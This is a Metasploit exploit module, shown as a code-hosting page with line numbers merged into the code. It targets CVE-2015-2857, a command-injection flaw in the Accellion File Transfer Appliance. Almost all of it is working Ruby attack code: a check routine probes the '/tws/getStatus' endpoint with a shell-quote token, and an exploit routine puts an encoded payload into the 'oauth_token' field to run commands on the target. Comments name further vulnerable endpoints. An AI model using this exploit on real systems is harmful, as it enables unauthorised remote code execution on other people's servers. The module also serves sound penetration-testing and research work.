Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(update_info(info,12'Name' => 'Accellion FTA getStatus verify_oauth_token Command Execution',13'Description' => %q{14This module exploits a metacharacter shell injection vulnerability in the Accellion15File Transfer appliance. This vulnerability is triggered when a user-provided16'oauth_token' is passed into a system() call within a mod_perl handler. This17module exploits the '/tws/getStatus' endpoint. Other vulnerable handlers include18'/seos/find.api', '/seos/put.api', and /seos/mput.api'. This issue was confirmed on19version FTA_9_11_200, but may apply to previous versions as well. This issue was20fixed in software update FTA_9_11_210.21},22'Author' => [ 'hdm' ],23'License' => MSF_LICENSE,24'References' =>25[26['URL', 'http://r-7.co/R7-2015-08'],27['CVE', '2015-2857']28],29'Platform' => ['unix'],30'Arch' => ARCH_CMD,31'Privileged' => false,32'Payload' =>33{34'Space' => 1024,35'DisableNops' => true,36'Compat' =>37{38'PayloadType' => 'cmd',39'RequiredCmd' => 'generic perl telnet',40}41},42'Targets' =>43[44[ 'Automatic', { } ]45],46'DefaultTarget' => 0,47'DisclosureDate' => '2015-07-10'48))4950register_options(51[52Opt::RPORT(443),53OptBool.new('SSL', [true, 'Use SSL', true])54])55end5657def check58uri = '/tws/getStatus'5960res = send_request_cgi({61'method' => 'POST',62'uri' => uri,63'vars_post' => {64'transaction_id' => rand(0x100000000),65'oauth_token' => 'invalid'66}})6768unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"MD5 token is invalid"/69return Exploit::CheckCode::Safe70end7172res = send_request_cgi({73'method' => 'POST',74'uri' => uri,75'vars_post' => {76'transaction_id' => rand(0x100000000),77'oauth_token' => "';echo '"78}})7980unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/81return Exploit::CheckCode::Safe82end8384Msf::Exploit::CheckCode::Vulnerable85end8687def exploit8889# The token is embedded into a command line the following:90# `/opt/bin/perl /home/seos/system/call_webservice.pl $aid oauth_ws.php verify_access_token '$token' '$scope'`;91token = "';#{payload.encoded};echo '"9293uri = '/tws/getStatus'9495# Other exploitable URLs:96# * /seos/find.api (works with no other changes to this module)97# * /seos/put.api (requires some hoop jumping, upload)98# * /seos/mput.api (requires some hoop jumping, token && upload)99100print_status("Sending request for #{uri}...")101res = send_request_cgi({102'method' => 'POST',103'uri' => uri,104'vars_post' => {105'transaction_id' => rand(0x100000000),106'oauth_token' => token107}})108109if res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/110print_status("Valid response received...")111else112if res113print_error("Unexpected reply from the target: #{res.code} #{res.message} #{res.body}")114else115print_error("No reply received from the target")116end117end118119handler120end121end122123124